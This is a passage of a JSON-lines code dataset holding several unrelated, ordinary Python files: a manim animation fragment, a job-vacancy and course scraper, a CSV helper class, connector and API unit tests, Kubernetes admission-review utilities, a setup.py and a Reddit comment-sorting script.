t2 + t3 + t4'\r\n text_sym_4.next_to(text_n1[3], RIGHT*0.5)\r\n text_sym_5.next_to(text_n2[3], RIGHT*0.5)\r\n text_sym_6.next_to(text_n3[3], RIGHT*0.5)\r\n ##三个省略号\r\n\r\n t_group1 = Group(text_n1[0], text_n1[1], text_n1[2], text_n1[3], text_sym_1[0], text_sym_1[1], text_sym_1[2], text_sym_1[3], text_sym_4)\r\n t_group2 = Group(text_n2[0], text_n2[1], text_n2[2], text_n2[3], text_sym_2[0], text_sym_2[1], text_sym_2[2], text_sym_2[3])\r\n t_group3 = Group(text_n3[0], text_n3[1], text_n3[2], text_n3[3], text_sym_3[0], text_sym_3[1], text_sym_3[2], text_sym_3[3])\r\n\r\n t_group_tmp = Group(t_group1, t_group2)\r\n\r\n#动画播放\r\n self.play(ShowCreation(cp,run_time = 4))#添加主坐标轴\r\n self.play(FadeIn(w_axes))#添加小坐标轴,以及小坐标轴相关的内容参数\r\n self.wait(0.5)\r\n\r\n self.play(FadeIn(arr_f0), FadeIn(arr0), )\r\n self.play(FadeIn(text_n1[0]))\r\n self.wait(0.2)\r\n\r\n self.play(FadeIn(arr_f1), FadeIn(arr1))\r\n self.play(FadeIn(text_n1[1]), FadeIn(text_sym_1[0]))\r\n self.wait(0.2)\r\n\r\n self.play(FadeIn(arr_f2), FadeIn(arr2))\r\n self.play(FadeIn(text_n1[2]), FadeIn(text_sym_1[1]))\r\n self.wait(0.2)\r\n\r\n self.play(FadeIn(arr_f3), FadeIn(arr3))\r\n self.play(FadeIn(text_n1[3]), FadeIn(text_sym_1[2]))\r\n self.wait(0.2)\r\n self.play(FadeIn(text_sym_4))\r\n\r\n #self.play(FadeIn(t_group2), FadeIn(arr0_r), FadeIn(arr1_r), FadeIn(arr2_r), FadeIn(arr3_r))\r\n #self.play(Transform(t_group_tmp, t_group3))\r\n self.wait(1)\r\n\r\n self.play(Transform(t_group1, text_sum1))\r\n\r\n self.wait(2)\r\n\r\n self.play(FadeOut(a_group), FadeOut(af_group), FadeOut(t_group1))\r\n #这里需要注意,虽然经过了transform方法,但是实例化的对象还是���本身,只是样式改变了,所以需要使用原本名命\r\n self.wait(3)","sub_path":"SDRproj/SDR2/Part8.py","file_name":"Part8.py","file_ext":"py","file_size_in_byte":9524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"312096197","text":"# %%\n\n# !/usr/bin/env python\n# coding: utf-8\n\nimport requests\nimport pandas as pd\nimport numpy as np\nfrom bs4 import 
BeautifulSoup\nimport re\n\n# initializing lists with information about job\njobs_content = [] # list with page content about job\njobs_names = [] # list with names of the jobs\njobs_links = [] # list with links to the job page\nall_jobs_links = [] # list of all jobs links\n\n# job we want to take\njob = 'Веб-разработчик'\n\n# going through all pages at hh.ru site and collecting links that\n# refer to job variable and also get content from them\nfor page_number in range(2):\n # creating link for our job and current page\n jobs_page = 'https://spb.hh.ru/search/vacancy?area=2&st=searchVacancy&text=' + job.lower() + '&page=' + str(\n page_number)\n\n # getting current hh.ru page with our job\n page = requests.get(jobs_page, headers={'User-Agent': 'Custom'})\n\n # clearing jobs links list\n jobs_links.clear()\n\n # cheking if page is ready to\n # bring us some data, else getting error code\n if page.status_code == 200:\n # parsing page using Beautiful soup\n soup = BeautifulSoup(page.text, 'html.parser')\n\n # forming vacancies list from link that\n # refer to partucular vacancy\n vacancies_list = soup.find_all('a', {'class': 'bloko-link HH-LinkModifier'})\n\n # cheking if vacancies list is not empty\n # and if so, getting vacancy name\n # and vacancy link, then retrieve data from vacancy page\n if len(vacancies_list) > 0:\n # collecting links and names of vacancies\n for vacancy in vacancies_list:\n jobs_names.append(vacancy.text)\n if vacancy['href']:\n jobs_links.append(vacancy['href'])\n all_jobs_links.append(vacancy['href'])\n else:\n print('No job link')\n jobs_links.append(None)\n\n # getting page content for each vacancy\n for link in jobs_links:\n # getting vacancy page\n job_page = requests.get(link, headers={'User-Agent': 'Custom'})\n\n # checking if page is ready to\n # bring us some data, else getting error code\n if job_page.status_code == 200:\n # parsing vacancy page using Beautiful Soup\n job_soup = BeautifulSoup(job_page.text, 'html.parser')\n\n # 
getting vacancy page content\n page_content = job_soup.find('div', {'class': 'g-user-content'})\n\n # forming jobs content list\n jobs_content.append(page_content)\n else:\n print(\"Something wrong with the page: \", job_page.status_code)\n print('vacancy problem')\n else:\n print('No items in vacancies_list')\n else:\n print('Something wrong with page: ', page.status_code)\n print('GEneral page problem')\n\n# initializing list with all data about vacancies\ndata_list = []\n\n# going through jobs contents and splitting it\n# by . So we get all important headings\n# and will be able to get requesments, conditions\n# and responsibilities\nfor job_content in jobs_content:\n data_list.append(re.split('', str(job_content).lower()))\n\n# initializing lists with information about vacancy\njobs_treb = [] # list of vacancy requerments\njobs_usl = [] # list of vancy conditions\njobs_obyaz = [] # list of vacancy responsibilities\njobs_desc = [] # list of vacancy desctiption\n\n# going through splitted data and getting\n# requerments, conditions, responsibilities\n# and descriptions\nfor job in data_list:\n # getting descriptiong because\n # it is always first in the split\n jobs_desc.append(job[0])\n\n # initializing flags witch note if there is\n # one of requesments, conditions and responsibilities\n # in the split\n treb_flag = False\n obyaz_flag = False\n usl_flag = False\n\n # checking if there is one of three conditions\n # in our split and if so, adding this conditions\n # to corresponding lists\n for job_content in job:\n if job_content.startswith('требования'):\n jobs_treb.append(job_content)\n treb_flag = True\n\n if job_content.startswith('обязанности'):\n jobs_obyaz.append(job_content)\n obyaz_flag = True\n\n if job_content.startswith('условия'):\n jobs_usl.append(job_content)\n usl_flag = True\n\n # if we haven't found any conditions\n # we add None item to corresponding list\n if treb_flag == False:\n jobs_treb.append(None)\n\n if obyaz_flag == False:\n 
jobs_obyaz.append(None)\n\n if usl_flag == False:\n jobs_usl.append(None)\n\n# initializing lists with clean data about requerments, conditions\n# and responsibilities\nnew_jobs_treb = [] # list of vacancy requerments\nnew_jobs_obyaz = [] # list of vacancy responsibilities\nnew_jobs_usl = [] # list of vacancy conditions\n\n\n# Cleaning informations funcition\n# Arguments:\n# Data we want to clean and list where we want\n# . to put this data\n# . (data, data_list)\n# Returns:\n# . None\ndef clear_data(data, data_list):\n # going through the data and firstly cleaning\n # out of three possible conditions, then split\n # out data by html tags to form list or conditions\n # and cleanign data out of usless symbols\n for elem in data:\n if elem != None:\n # cleaning of three conditions\n item = re.sub('требования', '', elem)\n item2 = re.sub('к кандидату', '', item)\n item3 = re.sub('к кандидатам', '', item2)\n item4 = re.sub('условия', '', item3)\n item5 = re.sub('обязанности', '', item4)\n\n # splitting by html tags\n splited_items = re.split(r'<.*?>', item5)\n\n # initializing list with clean items\n cleared_items = []\n\n # going through splitted items, cleaning\n # them and adding to cleared items list\n for item in splited_items:\n cleared_items.append(re.sub(r'[^\\w\\d\\s]+', '', re.sub(r'\\s+', ' ', re.sub(r'<.*?>', '', item))))\n\n # deleating all empty items\n while (\"\" in cleared_items):\n cleared_items.remove(\"\")\n\n # deleating all space items\n while (\" \" in cleared_items):\n cleared_items.remove(\" \")\n\n # adding cleaned items to data_list\n data_list.append(cleared_items)\n else:\n # if no element in data, adding None\n data_list.append(None)\n\n\n# claning information\nclear_data(jobs_obyaz, new_jobs_obyaz)\nclear_data(jobs_usl, new_jobs_usl)\nclear_data(jobs_treb, new_jobs_treb)\n\n# initializing list for cleaned\n# description data\nnew_jobs_desc = []\n\n# going through all descriptions\n# and cleaning it\nfor desc in jobs_desc:\n # if something 
in descriotion, cleaning\n # it, overwise, adding None\n if desc != None:\n item = re.sub(r'[^\\w\\d\\s]+', '', re.sub(r'\\s+', ' ', re.sub(r'<.*?>', '', desc)))\n new_jobs_desc.append(item)\n else:\n new_jobs_desc.append(None)\n\n# forming DataFrame from retrieved data\nweb_data = pd.DataFrame({'description': new_jobs_desc, 'requerments': new_jobs_treb, 'conditions': new_jobs_usl,\n 'responsibilities': new_jobs_obyaz, 'links': all_jobs_links})\n\n# initializing lists of courses information\ncourses_links = [] # list of courses links\ncourses_skills = [] # list of courses skills\npage_links = [] # links to cources on current page\n\n# going through all pages of current job we want to take\n# and getting information about skilles we want to aquire\nfor page in range(1, 13):\n # forming link to courcera pages with job courses we want\n courses_link = 'https://www.coursera.org/search?query=web%20development&indices%5Bprod_all_products_term_optimization%5D%5Bpage%5D=' + str(\n page) + '&indices%5Bprod_all_products_term_optimization%5D%5Bconfigure%5D%5BclickAnalytics%5D=true&indices%5Bprod_all_products_term_optimization%5D%5Bconfigure%5D%5BruleContexts%5D%5B0%5D=ru&indices%5Bprod_all_products_term_optimization%5D%5Bconfigure%5D%5BhitsPerPage%5D=10&configure%5BclickAnalytics%5D=true'\n\n # getting current page\n page = requests.get(courses_link, headers={'User-Agent': 'Custom'})\n\n # cheking if page is ready to\n # bring us some data, else getting error code\n if page.status_code == 200:\n # parsing page using Beautiful Soup\n soup = BeautifulSoup(page.text, 'html.parser')\n\n # getting all courses links at current page\n courses_list = soup.find_all('a', {'data-click-key': 'search.search.click.search_card'})\n\n # checking if there are courses link on\n # the page and if so, adding links to links list\n # getting course page and retrieving skilles\n if len(courses_list) > 0:\n # clearing page links list\n page_links.clear()\n\n # going through courses and forming 
links\n for course in courses_list:\n # adding links to links list\n courses_links.append('https://www.coursera.org' + course['href'])\n page_links.append('https://www.coursera.org' + course['href'])\n\n # going through links and getting pages and skilles\n for link in page_links:\n # getting course page\n course_page = requests.get(link, headers={'User-Agent': 'Custom'})\n\n # cheking if page is ready to\n # bring us some data, else getting error code\n if course_page.status_code == 200:\n # parsing page using Beautiful Soup\n course_soup = BeautifulSoup(course_page.text, 'html.parser')\n\n # getting all acquired skilles from course page\n acquired_skilles = course_soup.find_all('div', {'class': 'Skills border-a p-x-2 p-t-1 p-b-2 m-y-2'})\n # adding skilles to skilles list\n courses_skills.append(acquired_skilles)\n else:\n print(\"Something wrong with page: \", course_page.status_code)\n courses_skills.append(None)\n print('Single cource problem')\n\n else:\n print('No items in courses_list')\n else:\n print('Something wrong with page: ', page.status_code)\n print('General cource problem')\n\n# initializing list of cleaned courses skilles\nnew_courses_skilles = []\n\n# going through all courses skills and\n# forming list of skills for each course\nfor course in courses_skills:\n # checking if something in courses list\n # and if so, getting it\n if course != None and len(course) > 0:\n # initializing list with skills\n # for current cource\n temp_skilles = []\n\n # getting all skilles for current course\n # forming temp_skilles list and adding it\n # to new_courses_skilles\n for skill in range(len(course[0].find_all('span', {'class': 'centerContent_dqfu5r'}))):\n temp_skilles.append(course[0].find_all('span', {'class': 'centerContent_dqfu5r'})[skill].text)\n new_courses_skilles.append(temp_skilles)\n else:\n new_courses_skilles.append(None)\n\n# getting data where requerments are not null\nweb_data_with_full_req = web_data[web_data['requerments'].notnull()]\n\n# 
setting to display all records in jupyter notebook\n# with a scrollbar\npd.set_option('display.max_columns', 150)\npd.set_option('display.width', 1000)\nweb_data_with_full_req\n\n# forming cources data with skilles and link to cources\ncources_data = pd.DataFrame({'skilles': new_courses_skilles, 'links': courses_links})\n\n# getting data where skills are not null\ncources_data_without_nones = cources_data[cources_data['skilles'].notnull()]\n\n\n# initializing list for new requerments\nnew_requerments = []\n\n# going through old requerments and extracting\n# only valuable information\nfor req in web_data_with_full_req['requerments']:\n # initializing temproary requerments list\n temp_req = []\n\n # going through single requerment and cleaning it\n for string in req:\n # cleaning requerments\n new_string = re.sub(r'[1-9]+', '', re.sub('ё', '', re.sub(r'\\s+', ' ', re.sub(r'[а-я]+', '', string))))\n new_s = re.sub(r'\\s+', ' ', new_string)\n\n # adding single requerment to temproary lsit\n temp_req.append(new_s)\n\n # adding temproary requerments list to\n # new requerments list\n new_requerments.append(temp_req)\n\n# deleating all space items\nfor item in new_requerments:\n while (\" \" in item):\n item.remove(\" \")\n\n# initializing requerments list\n# where all key words are splitted\nupdate_requerments = []\n\n# going through all requerments and\n# splitting them by space\nfor req in new_requerments:\n # initializing temproary list for single string\n temp = []\n\n # going through single string and splitting it\n # by space\n for i in req:\n splited_req = i.split()\n\n # adding splitted requerments to temp list\n temp.append(splited_req)\n\n # adding splitted items to updated requerments list\n update_requerments.append(temp)\n\nupdate_requerments\n\n# updating vacancies list with cleaned requerments\nweb_data_with_full_req['cleaned requerments'] = update_requerments\n\nweb_data_with_full_req\n\ncources_data_without_nones\n\n# initializing list for web 
development key words\nweb_development_keywords = []\n\n# going through requerments and forming keywords list\nfor cource_reqs in web_data_with_full_req['cleaned requerments']:\n for req in cource_reqs:\n for i in req:\n web_development_keywords.append(i)\n\n# going through skilles and forming keywords list\nfor cource_skilles in cources_data_without_nones['skilles']:\n for skill in cource_skilles:\n temp_words = skill.split()\n for i in temp_words:\n web_development_keywords.append(i)\n\n# initializing list for cleaned key words\nnew_web_development_keywords = []\n\n# cleaning key words\nfor word in web_development_keywords:\n new_word = re.sub('\\(', '', word)\n clered_word = re.sub('\\)', '', new_word)\n clered_word = re.sub('[\\+]+', '', clered_word)\n new_web_development_keywords.append(clered_word)\n\nnew_web_development_keywords\n\ndef get_cources(vacancy_link):\n # getting vacancy page\n job_page = requests.get(vacancy_link, headers={'User-Agent': 'Custom'})\n\n # checking if page is ready to\n # bring us some data, else getting error code\n if job_page.status_code == 200:\n # parsing vacancy page using Beautiful Soup\n job_soup = BeautifulSoup(job_page.text, 'html.parser')\n\n # getting vacancy page content\n page_content = job_soup.find('div', {'class': 'g-user-content'})\n\n # getting splitted page content\n splitted_page_content = re.split('', str(page_content).lower())\n\n # initializing flags witch note if\n # requerments in split\n treb_flag = False\n\n # initializing jobs requerments list\n job_requerments = []\n\n # checking if requerments in the list\n for job_content in splitted_page_content:\n if job_content.startswith('требования'):\n job_requerments.append(job_content)\n treb_flag = True\n\n # if requerments in vacancy, we simply get them\n # and find suitable cources\n if treb_flag != False:\n print('YES')\n item = re.sub('требования', '', job_requerments[0])\n item2 = re.sub('к кандидату', '', item)\n item3 = re.sub('к кандидатам', '', 
item2)\n\n # splitting by html tags\n splited_items = re.split(r'<.*?>', item3)\n\n # initializing list with clean items\n cleared_items = []\n\n # going through splitted items, cleaning\n # them and adding to cleared items list\n for item in splited_items:\n cleared_items.append(re.sub(r'[^\\w\\d\\s]+', '', re.sub(r'\\s+', ' ', re.sub(r'<.*?>', '', item))))\n\n # deleating all empty items\n while (\"\" in cleared_items):\n cleared_items.remove(\"\")\n\n # deleating all space items\n while (\" \" in cleared_items):\n cleared_items.remove(\" \")\n\n print(cleared_items)\n\n # initializing list for new requerments\n new_req = []\n\n # initializing temproary requerments list\n temp_req = []\n\n # going through single requerment and cleaning it\n for string in cleared_items:\n # cleaning requerments\n new_string = re.sub(r'[1-9]+', '', re.sub('ё', '', re.sub(r'\\s+', ' ', re.sub(r'[а-я]+', '', string))))\n new_s = re.sub(r'\\s+', ' ', new_string)\n\n # adding single requerment to temproary lsit\n temp_req.append(new_s)\n\n # adding temproary requerments list to\n # new requerments list\n new_req.append(temp_req)\n\n # deleating all space items\n for item in new_req:\n while (\" \" in item):\n item.remove(\" \")\n\n # initializing list with cleared requrments\n cleared_reqs = []\n\n for i in new_req[0]:\n temp_item = i.split()\n for j in temp_item:\n cleared_reqs.append(j)\n\n print(cleared_reqs)\n\n # initializing cources list\n cources_list = []\n\n # going through requerments and finding cources\n for req in cleared_reqs:\n for (cources_skilles, link) in \\\n zip(cources_data_without_nones['skilles'], cources_data_without_nones['links']):\n if re.search(req, (''.join(cources_skilles)).lower()):\n cources_list.append(link)\n\n return cources_list\n\n else:\n print('No requerments')\n # clearing vacancy data\n cleared_content = re.sub(r'[^\\w\\d\\s]+', '',\n re.sub(r'\\s+', ' ', re.sub(r'<.*?>', '', str(splitted_page_content))))\n\n # key words set\n key_words = 
set()\n\n # getting possibles requerments\n for word in new_web_development_keywords:\n if re.search(word, cleared_content):\n if len(word) < 3:\n continue\n else:\n key_words.add(word)\n\n print(key_words)\n\n # initializing cources list\n cources_list = []\n\n # going through requerments and finding cources\n for req in key_words:\n for (cources_skilles, link) in \\\n zip(cources_data_without_nones['skilles'], cources_data_without_nones['links']):\n if re.search(req, (''.join(cources_skilles)).lower()):\n cources_list.append(link)\n\n return cources_list\n else:\n print(\"Something wrong with the page: \", job_page.status_code)\n print('vacancy problem')\n\nlinks = get_cources(\n 'https://spb.hh.ru/vacancy/35471010?query=%D0%B2%D0%B5%D0%B1%20%D1%80%D0%B0%D0%B7%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D1%87%D0%B8%D0%BA')\n\nlinks\n\nlinks2 = get_cources(\n 'https://spb.hh.ru/vacancy/35564260?query=%D0%B2%D0%B5%D0%B1%20%D1%80%D0%B0%D0%B7%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D1%87%D0%B8%D0%BA')\n\nlinks2\n","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":19704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"412902976","text":"\nclass FileIO(object):\n '''\n General read/write of files\n '''\n def __init__(self, in_file=None, out_file=None, data=None):\n self.file = in_file\n self.out = out_file\n # self.fields = []\n self.data = data\n\n def write(self):\n if self.out is not None:\n with codecs.open(self.out, \"w\", encoding=\"utf-8\") as f:\n fieldnames = list(self.data_list[0].keys()) \n writer = csv.DictWriter(f, fieldnames=fieldnames, delimiter=DELIMITER) \n writer.writeheader() \n for event in self.data_list: \n writer.writerow(event) \n else:\n print(\"Output file is not specified - cannot write\", file=sys.stderr)\n \n def read(self, verbose=False):\n if self.file is not None:\n with codecs.open(self.file, \"r\", encoding=LOG_ENCODING) as f:\n i = 0\n li = []\n reader = csv.DictReader(f, 
delimiter=\" \")\n for row in reader:\n if verbose:\n i += 1 \n if i % 25 == 0:\n print(\"processed %s events\" % i)\n li.append(row)\n self.data = li\n else:\n print(\"Input file is not specified - cannot read\", file=sys.stderr)","sub_path":"fileIO.py","file_name":"fileIO.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"240464132","text":"from unittest.mock import MagicMock, patch\n\nfrom hummingbot.client.config.client_config_map import ClientConfigMap\nfrom hummingbot.client.config.config_helpers import ClientConfigAdapter\nfrom hummingbot.connector.exchange.eve.eve_exchange import EveExchange\nfrom hummingbot.connector.exchange.eve.eve_web_utils import EveURLCreator\nfrom hummingbot.connector.test_support.oms_exchange_connector_test import OMSExchangeTests\n\n\nclass EveExchangeTests(OMSExchangeTests.ExchangeTests):\n @classmethod\n def setUpClass(cls) -> None:\n super().setUpClass()\n cls._url_creator = EveURLCreator(\n rest_base_url=\"https://some.url\",\n ws_base_url=\"ws://some.url\",\n )\n\n @property\n def url_creator(self):\n return self._url_creator\n\n @patch(\"hummingbot.core.utils.tracking_nonce.NonceCreator._time\")\n def create_exchange_instance(self, time_mock: MagicMock, authenticated: bool = True) -> EveExchange:\n time_mock.return_value = self.time_mock\n client_config_map = ClientConfigAdapter(ClientConfigMap())\n exchange = EveExchange(\n client_config_map=client_config_map,\n eve_api_key=self.api_key,\n eve_secret_key=self.secret,\n eve_user_id=self.user_id,\n trading_pairs=[self.trading_pair],\n url_creator=self.url_creator,\n )\n if authenticated:\n self._initialize_auth(exchange.authenticator)\n return 
exchange\n","sub_path":"test/hummingbot/connector/exchange/eve/test_eve_exchange.py","file_name":"test_eve_exchange.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"189575038","text":"import os\nimport base64\nimport re\nimport json\nimport yaml\nfrom jsonschema import validate, ValidationError, FormatChecker\nfrom connaisseur.exceptions import PathTraversalError\n\n\ndef safe_path_func(callback: callable, base_dir: str, path: str, *args, **kwargs):\n if os.path.commonprefix((os.path.realpath(path), base_dir)) != base_dir:\n msg = \"Potential path traversal in {path}.\"\n raise PathTraversalError(message=msg, path=path)\n return callback(path, *args, **kwargs)\n\n\ndef safe_json_open(base_dir: str, path: str):\n with safe_path_func(open, base_dir, path, \"r\") as file:\n return json.load(file)\n\n\ndef safe_yaml_open(base_dir: str, path: str):\n with safe_path_func(open, base_dir, path, \"r\") as file:\n return yaml.safe_load(file)\n\n\ndef get_admission_review(\n uid: str,\n allowed: bool,\n patch: list = None,\n msg: str = None,\n detection_mode: bool = False,\n):\n \"\"\"\n Get a standardized response object with patching instructions for the\n request and error message.\n\n Parameters\n ----------\n uid : str\n The uid of the request that was sent to the Admission Controller.\n allowed : bool\n The decision, whether the request will be accepted or denied.\n patch : list (optional)\n A list with JSON patch instruction, that will modify the original\n request, send to the Admission Controller. 
The list is Base64\n encoded.\n msg : str (optional)\n The error message, which will be displayed, should allowed be\n 'False'.\n detection_mode : bool (optional)\n If set to True, Connaisseur will admit images even if they fail\n validation, but will log a warning instead.\n\n Return\n ----------\n AdmissionReview : dict\n Response is an AdmissionReview with following structure:\n\n {\n \"apiVersion\": \"admission.k8s.io/v1beta1\",\n \"kind\": \"AdmissionReview\",\n \"response\": {\n \"uid\": uid,\n \"allowed\": allowed,\n \"status\": {\n \"code\": 200,\n \"message\": \"All gucci, my boi.\"\n },\n \"warnings\": [\"detection_mode ON\"]\n \"patchType\": \"JSONPatch\",\n \"patch\":\n \"W3sib3AiOiAiYWRkIiwgInBhdGgiOiAiL3NwZWMvcmVwbGljYXMiLCAidmFsdWUiOiAzfV0=\"\n }\n }\n \"\"\"\n _, minor, _ = get_kube_version()\n api = \"v1beta1\" if int(minor) < 17 else \"v1\"\n review = {\n \"apiVersion\": f\"admission.k8s.io/{api}\",\n \"kind\": \"AdmissionReview\",\n \"response\": {\n \"uid\": uid,\n \"allowed\": allowed or detection_mode,\n \"status\": {\"code\": 202 if allowed or detection_mode else 403},\n },\n }\n\n if msg:\n review[\"response\"][\"status\"][\"message\"] = msg\n if detection_mode and not allowed:\n review[\"response\"][\"warnings\"] = [msg]\n\n if patch:\n review[\"response\"][\"patchType\"] = \"JSONPatch\"\n review[\"response\"][\"patch\"] = base64.b64encode(\n bytearray(json.dumps(patch), \"utf-8\")\n ).decode(\"utf-8\")\n\n return review\n\n\ndef validate_schema(data: dict, schema_path: str, kind: str, exception):\n with open(schema_path, \"r\", encoding=\"utf-8\") as schema_file:\n schema = json.load(schema_file)\n\n try:\n validate(instance=data, schema=schema, format_checker=FormatChecker())\n except ValidationError as err:\n msg = \"{validation_kind} has an invalid format: {validation_err}.\"\n raise exception(\n message=msg,\n validation_kind=kind,\n validation_err=str(err),\n ) from err\n\n\ndef get_kube_version():\n \"\"\"\n Returns the kubernetes 
version.\n\n Return\n ----------\n (major, minor, patch): Tupel\n Major and minor version can always be assumed to be parseable as `int`s, the\n patch version could be arbitrary text.\n \"\"\"\n version = os.environ.get(\"KUBE_VERSION\", \"v0.0.0\") # e.g. `v1.20.0`\n regex = r\"v(\\d)\\.(\\d{1,2})\\.(.*)\"\n match = re.match(regex, version)\n return match.groups() if match else (\"0\", \"0\", \"0\")\n","sub_path":"connaisseur/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"286156329","text":"\"\"\"\n Copyright 2018 Globo.com\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\nfrom setuptools import setup\n\nVERSION = __import__('globomap_plugin_zabbix').__version__\n\nsetup(\n name='globomap-plugin-zabbix',\n version=VERSION,\n description='Zabbix monitoring plugin on globomap-api',\n author='Storm',\n author_email='storm@corp.globo.com',\n url='https://gitlab.globoi.com/globomap/globomap-plugin-zabbix',\n packages=['globomap_plugin_zabbix'],\n package_data={'globomap_plugin_zabbix': ['*.py']},\n)\n","sub_path":"pypi_install_script/globomap-plugin-zabbix-0.1.6.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"30909867","text":"import json\nimport random\nimport sys\nfrom os import path\n\ndef p(jsonfile):\n with 
open(jsonfile) as d:\n x = 0\n for line in d:\n x += 1\n if x % 100000 == 0:\n print(x)\n print(x)\n\ndef process(json_file, prob=0.05):\n politics = [\"anarchism\", \"anarcho_capitalism\", \"antiwork\", \"breadtube\", \"chapotraphouse\", \"communism\", \"completeanarchy\", \"conservative\", \"cringeanarchy\", \"democraticsocialism\", \"esist\", \"fullcommunism\", \"goldandblack\", \"jordanpeterson\", \"keep_track\", \"latestagecapitalism\", \"latestagesocialism\", \"liberal\", \"libertarian\", \"neoliberal\", \"onguardforthee\", \"ourpresident\", \"political_revolution\", \"politicalhumor\", \"politics\", \"progressive\", \"republican\", \"sandersforpresident\", \"selfawarewolves\", \"socialism\", \"the_donald\", \"the_mueller\", \"thenewright\", \"voteblue\", \"wayofthebern\", \"yangforpresidenthq\"]\n sports = [\"baseball\", \"boxing\", \"cricket\", \"football\", \"golf\", \"hockey\", \"mma\", \"nba\", \"nfl\", \"nhl\", \"running\", \"soccer\", \"tennis\"]\n cities = [\"atlanta\", \"austin\", \"baltimore\", \"birmingham\", \"boston\", \"buffalo\", \"charlotte\", \"chicago\", \"cincinnati\", \"cleveland\", \"columbus\", \"dallas\", \"denver\", \"detroit\", \"hartford\", \"houston\", \"indianapolis\", \"jacksonville\", \"kansascity\", \"lasvegas\", \"losangeles\", \"louisville\", \"memphis\", \"miami\", \"milwaukee\", \"minneapolis\", \"nashville\", \"neworleans\", \"nyc\", \"okc\", \"orlando\", \"philadelphia\", \"phoenix\", \"pittsburgh\", \"portland\", \"providence\", \"raleigh\", \"richmond\", \"rochester\", \"sacramento\", \"saltlakecity\", \"sanantonio\", \"sandiego\", \"sanfrancisco\", \"sanjose\", \"stlouis\", \"tampa\", \"virginiabeach\", \"washingtondc\"]\n saved = {}\n with open(json_file) as data:\n line_num = 0\n for line in data:\n obj = json.loads(line)\n out = None\n subr = obj['subreddit'].lower()\n if subr in politics:\n out = \"politics.csv\"\n elif subr in sports:\n out = \"sports.csv\"\n elif subr in cities:\n out = \"cities.csv\"\n elif 
random.random() < prob:\n out = \"noise.csv\"\n if out != None and obj['author'] != \"[deleted]\":\n info = [\n obj['id'],\n subr,\n obj['created_utc'],\n obj['author'],\n obj['link_id'],\n obj['parent_id'],\n obj['score'],\n obj['body'].replace(\"\\n\", \" \").replace(\"\\r\", \"\").replace(\"\\t\", \" \")\n ]\n if out in saved:\n saved[out].append(info)\n if line_num % 10000 == 0:\n print(out, len(saved[out]), line_num)\n else:\n saved[out] = [info]\n line_num += 1\n for name in saved:\n header = not path.exists(name)\n with open(name, \"a\") as f:\n if header:\n f.write(\"id\\tsubreddit\\tcreated_utc\\tauthor\\tlink_id\\tparent_id\\tscore\\tbody\\n\")\n for e in saved[name]:\n f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(e[0],e[1],e[2],e[3],e[4],e[5],e[6],e[7]))\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 2:\n file_name = str(sys.argv[1])\n process(file_name)\n","sub_path":"reddit_json.py","file_name":"reddit_json.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"65296489","text":"# Copyright 2014 - Savoir-Faire Linux inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport copy\nimport json\n\n\nfrom surveil.tests.api import functionalTest\n\n\nclass TestMacroModulationController(functionalTest.FunctionalTest):\n\n def setUp(self):\n super(TestMacroModulationController, self).setUp()\n self.modulations = [\n {\n 'macromodulation_name': 'HighDuringNight',\n 'modulation_period': 'night',\n '_CRITICAL': 20,\n '_WARNING': 10,\n },\n {\n 'macromodulation_name': 'LowDuringNight',\n 'modulation_period': 'night',\n '_CRITICAL': 10,\n '_WARNING': 20,\n }\n ]\n self.mongoconnection.shinken.macromodulations.insert(\n copy.deepcopy(self.modulations)\n )\n\n def test_get_all_macromodulations(self):\n response = self.get('/v2/config/macromodulations')\n\n self.assert_count_equal_backport(\n [\n {\n 'macromodulation_name': 'HighDuringNight',\n 'modulation_period': 'night',\n 'macros': {\n '_CRITICAL': 20,\n '_WARNING': 10}},\n {\n 'macromodulation_name': 'LowDuringNight',\n 'modulation_period': 'night',\n 'macros': {\n '_CRITICAL': 10,\n '_WARNING': 20}}\n ],\n json.loads(response.body.decode())\n\n )\n self.assertEqual(response.status_int, 200)\n\n def test_get_one_macromodulation(self):\n response = self.get('/v2/config/macromodulations/HighDuringNight')\n\n self.assertEqual(\n json.loads(response.body.decode()),\n {'macromodulation_name': 'HighDuringNight',\n 'modulation_period': 'night',\n 'macros': {\n '_CRITICAL': 20,\n '_WARNING': 10}}\n )\n\n def test_create_macromodulation(self):\n m = {\n 'macromodulation_name': 'TEST_CREATE_MODULATION',\n 'modulation_period': 'night',\n 'macros': {\n '_CRITICAL': 10,\n '_WARNING': 20\n }\n }\n\n self.post_json('/v2/config/macromodulations', m)\n\n self.assertIsNotNone(\n self.mongoconnection.shinken.macromodulations.find_one(\n 